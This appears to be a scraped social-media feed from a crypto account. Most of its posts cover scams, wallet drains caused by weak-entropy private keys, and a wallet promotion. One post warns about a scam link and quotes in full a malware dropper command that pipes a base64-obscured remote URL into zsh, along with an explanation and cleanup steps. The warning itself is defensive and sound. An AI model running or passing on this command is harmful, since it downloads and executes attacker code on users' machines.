Senang.BTC ➞₿🔑∎
5.8K posts

Senang.BTC ➞₿🔑∎
@senangbit
Crypto 4 NUSANTARA by @tunaiBTC & co. 1. GET $BTC etc. 2. HODL securely! 3. SPEND: https://t.co/mLsyr9Leqz (FREE!) -- https://t.co/4DgaCtjhKh


I nearly got scammed today. there are scammers online. Be careful guys These are the scam links meendo.ai/join/JkmLKk?pw… must be a virus ; Yes — that command is highly suspicious and should be treated as potential malware. Here’s what it does: curl -kfsSL $(echo 'aHR0cDovL2ZyZWRzY2FycGV0Y2xlYW5pbmcuY29tL2N1cmwvNTc4NDc0YWRkYTQ3MWQzNzlmNzk2NDM4ZmU1OTQ5MjI1ZWIzYjE3NjhkN2VhZGU5MzU5NjFkMGUxNjFiMTg1Yw=='|base64 -D)|zsh The Base64 string decodes to: fredscarpetcleaning.com/curl/578474add… So the full behavior is effectively: curl -kfsSL fredscarpetcleaning.com... | zsh That means: 1. Downloads a remote script from a website 2. Pipes it directly into zsh 3. Executes it immediately on your machine Red flags: * Uses Base64 to obscure the URL * Uses curl | zsh execution pattern * Uses plain HTTP instead of HTTPS * -k disables certificate validation * Random-looking path/hash strongly resembles payload delivery * Carpet-cleaning domain unrelated to software distribution This is a classic malware/dropper/social-engineering pattern. Do not run it. If you already executed it: 1. Disconnect from the network 2. Check: * ~/.zshrc * ~/.bashrc * crontab entries (crontab -l) * LaunchAgents/systemd services 3. Look for newly installed SSH keys: ls -la ~/.ssh 4. Rotate passwords/tokens 5. Scan the system with security tools 6. Consider the machine potentially compromised You can safely inspect the downloaded content without executing it by doing: curl -fsSL "fredscarpetcleaning.com/curl/578474add…" …but only inside an isolated VM/sandbox, not on a trusted machine.

@bitget Can’t seem to be ready for Apple Pay (wallet)










Funds left my wallet to this address. Not sure what the vulnerability surface is. Others are getting zeroed out as well. Mainnet ETH only and strangely SAI: etherscan.io/address/0xa707…




Hyperliquid is now live in Trust Wallet with 0% markup on fees for 3 months. 🚀 With @HyperliquidX and @tradexyz, expect broader market coverage; RWAs & Commodities. 200+ Perp markets & deep liquidity. Learn more: short.trustwallet.com/hl-in-trust






The wallets share a clear pattern: most were created pre-2019 using early brainwallet generators, browser wallets, or vanity address tools with weak entropy (predictable randomness in private key creation). Probable cause: Attackers brute-forced/cracked those weak keys with modern tools and improved compute power. It's not a smart contract vuln, approval drainer, or hack of active wallets—funds moved directly via the private keys. ~261 ETH (~$590K) total so far, laundered via THORChain + bridges/Uniswap. Old dormant keys are now at risk.








